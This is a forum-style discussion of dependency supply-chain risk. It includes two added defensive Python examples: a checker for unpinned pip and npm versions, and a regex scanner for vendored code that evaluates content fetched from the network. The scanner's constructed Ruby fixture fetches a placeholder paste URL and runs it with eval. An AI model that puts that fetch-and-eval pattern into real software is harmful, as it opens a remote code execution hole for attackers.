If you're not rigorously auditing dependencies [+], you're as secure as the least secure account, application, or trusted application of the least secure person with commit access in your supply chain. [+] You are not. [++] [++] No, really, you are not.
A mitigation here, which you will probably want anyhow, is to only upgrade dependencies based on explicit choice rather than slurping down upgrades optimistically. This mitigation is not normative in some development communities, which may pose some cultural challenges.
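One concrete form of "upgrade only by explicit choice" is to refuse manifests that leave any dependency floating on a range. The checker below is an added example written for this page, not code from the thread or its author; the requirements.txt and package.json contents are constructed, and the helper names (unpinned_pip, unpinned_npm) are the example's own.

```python
"""Report dependencies that are not pinned to one exact version.

Added example, not from the original thread. Both manifests below are
constructed samples; a real run would read the project's own files.
"""
import json
import re

# Constructed requirements.txt: one exact pin, three optimistic specifiers.
SAMPLE_REQUIREMENTS = """\
requests==2.31.0
urllib3>=1.26
flask~=2.3
# a comment line is ignored
pyyaml
"""

# Constructed package.json: one exact version, three ranges.
SAMPLE_PACKAGE_JSON = json.dumps({
    "dependencies": {"lodash": "4.17.21", "express": "^4.18.2"},
    "devDependencies": {"jest": "~29.7.0", "left-pad": "latest"},
})

# name, optional comparison operator, optional version (pip syntax subset).
_PIP_LINE = re.compile(r"^\s*([A-Za-z0-9_.\-]+)\s*(==|>=|<=|~=|!=|>|<)?\s*([^\s;#]*)")
# npm exact version: bare MAJOR.MINOR.PATCH with no range prefix.
_NPM_EXACT = re.compile(r"^\d+\.\d+\.\d+$")


def unpinned_pip(requirements_text):
    """Return names of requirements whose specifier is not an exact '=='."""
    loose = []
    for raw in requirements_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("-"):   # blank, comment, or pip option
            continue
        match = _PIP_LINE.match(line)
        if not match:
            continue
        name, operator, version = match.groups()
        if operator != "==" or not version:
            loose.append(name)
    return loose


def unpinned_npm(package_json_text):
    """Return names of package.json dependencies given as a range, tag, or
    caret/tilde specifier rather than one exact semver."""
    data = json.loads(package_json_text)
    loose = []
    for section in ("dependencies", "devDependencies"):
        for name, spec in data.get(section, {}).items():
            if not _NPM_EXACT.match(spec):
                loose.append(name)
    return loose


if __name__ == "__main__":
    print("pip, not pinned:", unpinned_pip(SAMPLE_REQUIREMENTS))
    print("npm, not pinned:", unpinned_npm(SAMPLE_PACKAGE_JSON))
```

Run as a pre-merge check it turns an optimistic upgrade into a visible diff someone has to approve. An exact version pin on its own says nothing about what the registry actually serves for that version, so the stronger form of the same idea is a lockfile that records content hashes alongside the versions.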
Having your application evaluate code grabbed from Pastebin at runtime [0] will *also* pose some cultural challenges, though. [0] The attack payload here.
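The pattern described here, a dependency that pulls a string off the network and then evaluates it, is crude enough to look for in vendored source before it ever runs. The scanner below is an added example for this page, not the thread's code; the three Ruby files it inspects are constructed, use an invalid placeholder host, and the function names (scan_source, scan_tree) are the example's own.

```python
"""Flag source files where a dynamic eval follows a network fetch.

Added example, not from the original thread. SAMPLE_FILES is a constructed
stand-in for a vendored dependency tree.
"""
import re

# Calls that pull content off the network (Ruby and Python spellings).
FETCH_RE = re.compile(
    r"Net::HTTP|URI\.open|open\(\s*['\"]https?://|urllib\.request|requests\.get|urlopen\("
)
# Calls that turn a string into executable code.
EVAL_RE = re.compile(r"\b(eval|instance_eval|class_eval|module_eval|exec)\s*[(\s]")

SAMPLE_FILES = {
    # Constructed: a library that fetches a paste and evaluates it at load time.
    "vendor/gems/example/lib/example.rb": """\
require 'net/http'
module Example
  def self.load_extra
    body = Net::HTTP.get(URI('https://paste.example.invalid/raw/PLACEHOLDER'))
    eval(body)
  end
end
""",
    # Constructed benign case: fetches data and parses it, never evaluates it.
    "vendor/gems/other/lib/other.rb": """\
require 'net/http'
require 'json'
data = JSON.parse(Net::HTTP.get(URI('https://api.example.invalid/v1/meta')))
""",
    # Constructed: eval of a local constant with no network fetch nearby.
    "vendor/gems/tmpl/lib/tmpl.rb": """\
TEMPLATE = 'puts 1'
eval(TEMPLATE)
""",
}


def scan_source(text, window=25):
    """Return (line_no, stripped_line) for each eval-style call that appears
    within `window` lines after a network fetch in the same file."""
    lines = text.splitlines()
    fetch_lines = [n for n, line in enumerate(lines, 1) if FETCH_RE.search(line)]
    findings = []
    for n, line in enumerate(lines, 1):
        if EVAL_RE.search(line) and any(0 <= n - f <= window for f in fetch_lines):
            findings.append((n, line.strip()))
    return findings


def scan_tree(files):
    """files: {path: source_text}. Returns {path: findings} for flagged files."""
    report = {}
    for path, text in files.items():
        hits = scan_source(text)
        if hits:
            report[path] = hits
    return report


if __name__ == "__main__":
    for path, hits in scan_tree(SAMPLE_FILES).items():
        for line_no, snippet in hits:
            print(f"{path}:{line_no}: fetch-then-eval: {snippet}")
```

The proximity rule keeps the noise down: a fetch that is only parsed, or an eval of a local template, is not reported. Being a regex over text it only catches the plain spelling of the pattern, so treat a clean result as one input to review rather than as a clearance, and pair it with the explicit-upgrade policy from the previous post so that a new version of a dependency cannot land without a human looking at its diff.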
Fortunately the 1.6 branch is older, and there are newer ones to choose from.